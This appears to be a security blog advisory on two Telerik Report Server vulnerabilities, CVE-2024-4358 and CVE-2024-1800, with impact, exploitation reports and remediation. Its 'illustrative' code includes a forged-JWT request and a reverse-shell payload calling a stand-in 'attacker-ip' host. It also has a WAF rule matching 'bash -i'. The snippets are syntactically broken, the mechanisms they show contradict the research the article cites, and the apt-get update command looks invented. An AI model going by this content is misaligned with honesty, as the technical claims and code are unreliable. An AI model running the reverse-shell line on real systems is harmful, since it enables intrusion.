CVE-2024-4358 and CVE-2024-1800 in Progress Telerik Report Server allow unauthorized access and remote code execution. Here's what we know.
On May the 31st Sina Kheirkhah, a security researcher of the Summoning Team, posted the discovery of an exploit chain involving two vulnerabilities – CVE-2024-4358 and CVE-2024-1800 – in Progress Telerik Report Server, a report management solution.
These vulnerabilities present serious risks to organizations utilizing this software, with potential implications ranging from unauthorized access to remote code execution (RCE).
Here’s what we know:
Affected products: |
Progress Telerik Report Server |
Product category: |
Report Manager |
Severity: |
Critical – 9.9, 9.8 |
Type: |
Authentication Bypass, Unauthorized Access to Remote Code Execution (RCE) |
Impact: |
Confidentiality (H), Integrity (H), Availability (H) |
PoC: |
|
Exploit in the wild |
Yes |
CISA Catalog |
No |
Remediation action |
Update to latest version of Progress Telerik Report Server |
MITRE advisory |
CVE-2024-4358 is an authentication bypass vulnerability in the Progress Telerik Report Server. This flaw allows an attacker to bypass authentication mechanisms and gain unauthorized access to the application.
The vulnerability arises due to improper handling of authentication tokens, which can be manipulated by attackers to impersonate legitimate users without providing valid credentials.
Kheirkhah and security researcher Soroush Dalili mention in Summoning Team’s blog, that the vulnerability is caused by flaws in the token validation process.
When a malicious token is crafted, the server incorrectly validates it, granting access without proper authentication. Here’s an illustrative snippet showing how the token manipulation might occur:
import jwt
# Crafting a malicious JWT token
malicious_token = jwt.encode({'user': 'admin', 'exp': 9999999999}, 'secret_key', algorithm='HS256') #
# Using the malicious token to bypass authentication
headers = {'Authorization': f'Bearer {malicious_token}'}
response = requests.get('https://victim-server/api/secure-endpoint', headers=headers)
if response.status_code == 200:
print("Authentication bypass successful!")
else:
print(”Failed to bypass authentication.")
This exploit enables attackers to perform actions with administrative privileges, significantly compromising the security of the affected system.
According to ZDI-24-561, the flaw exists due to a lack of validation of the current installation step in the Register method. The vulnerability has been assigned a CVSS score of 9.8 from both vendor and ZDI.
CVE-2024-1800 is a critical remote code execution (RCE) vulnerability in the Progress Telerik Report Server. This vulnerability allows an attacker to execute arbitrary code on the server, potentially taking full control of the system.
The issue stems from improper input validation, which can be exploited to inject and execute malicious code.
SOCRadar reports that the vulnerability is due to insufficient sanitization of user inputs in certain API endpoints.
By sending a specially crafted request, an attacker can inject malicious commands into the system.
Below is an example demonstrating a basic payload that could be used to exploit this vulnerability:
import jwt
# Malicious payload to execute a reverse shell
payload = {
'command: 'bash –i /dev/tcp/attacker-ip/4444 0>&1’
}
# Sending the malicious request to the vulnerable endpoint
response = requests.post('https://victim-server/api/execute-command, json=payload)
if response.status_code == 200:
print("RCE successful!")
else:
print(”Failed to execute RCE.")
Successful exploitation of this vulnerability can lead to complete system compromise, allowing attackers to steal data, disrupt services, or further propagate malware within the network.
As noted last March by Censys, “An attacker with remote access and an ability to execute malicious code on such an asset may allow such an attacker to not only interfere with reporting functionality but also to better understand a victim’s network or gain further access leveraging the Active Directory integration. Such an attack can serve as a beachhead, or beginning, on a victim organization for attackers.”
An advisory from Trend Micro’s Zero Day Initiative (ZDI) suggests that a low privileged user is required. After being able to identify an authentication bypass issue (CVE-2024-4358), Kheirkhah worked with Dalili to “complete the deserialization chain” to combine both flaws to achieve RCE.
According to Kheirkhah, a specific endpoint used for setting up the Progress Telerik Report Server lacks proper authentication.
This endpoint remains accessible to unauthenticated attackers even after the admin setup is complete, allowing attackers to bypass authentication and create a user with system administrator privileges on the server.
By combining the authentication bypass flaw (CVE-2024-4358) with the insecure deserialization vulnerability (CVE-2024-1800), attackers can form an exploit chain.
This enables them to create a malicious report and execute arbitrary code on a vulnerable Progress Telerik Report Server.
If you are using the Progress Telerik Report Server, CVE-2024-4358 likely affects you. The vulnerability is present in versions prior to the latest security update.
You can verify if your system is vulnerable by checking the version of your Telerik Report Server and ensuring it aligns with the versions mentioned in the advisories from Summoning Team and SOCRadar.
CVE-2024-1800 affects organizations running vulnerable versions of the Progress Telerik Report Server. Given the critical nature of this RCE vulnerability, it is imperative to ascertain whether your system is running an impacted version.
SOCRadar’s analysis provides detailed information on affected versions, which should be cross-referenced with your current deployment.
According to BleepingComputer, there have been active exploitations of CVE-2024-4358 in the wild. Attackers have leveraged this vulnerability to gain unauthorized access to vulnerable systems, emphasizing the need for immediate remediation.
Reports from various security researchers, including those at Summoning Team, corroborate the active exploitation, making it a critical issue for administrators to address.
While there have been fewer reports on the active exploitation of CVE-2024-1800 compared to CVE-2024-4358, the potential for exploitation remains high.
Enterprise administrators should promptly upgrade their Telerik installations. While CVE-2024-1800 requires an update to be resolved, the risk posed by CVE-2024-4358 can be temporarily mitigated using a URL Rewrite technique as outlined in the advisory.
Progress Software also recommends that administrators review the Report Server’s user list at ‘{host}/Users/Index’ for any unauthorized local users.
As mentioned in Helpnetsecurity’s blog, vulnerabilities in Progress’ enterprise solutions have been targeted by attackers during the last years.
The MOVEit Transfer zero-day (CVE-2023-34362) was exploited by the Cl0p ransomware gang, impacting over 2,700 organizations. Late last year, critical vulnerabilities in WS_FTP Server were exploited shortly after PoC code was published.
The most effective way to fix CVE-2024-4358 is to apply the latest security update provided by Progress Telerik. This update addresses the authentication bypass issue by enhancing the token validation mechanisms.
# Example command to update Telerik Report Server
sudo apt-get update
sudo apt-get install telerik-report-server
Apply the latest security patches from Progress Telerik that address the RCE vulnerability. These patches implement stricter input validation and sanitization to prevent code injection attacks.
Mitigation steps
# Example configuration to deploy a web application firewall (WAF)
waf_config:
rules:
- name: block_malicious_payloads
condition:
contains: "bash -i"
action: "block"
Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: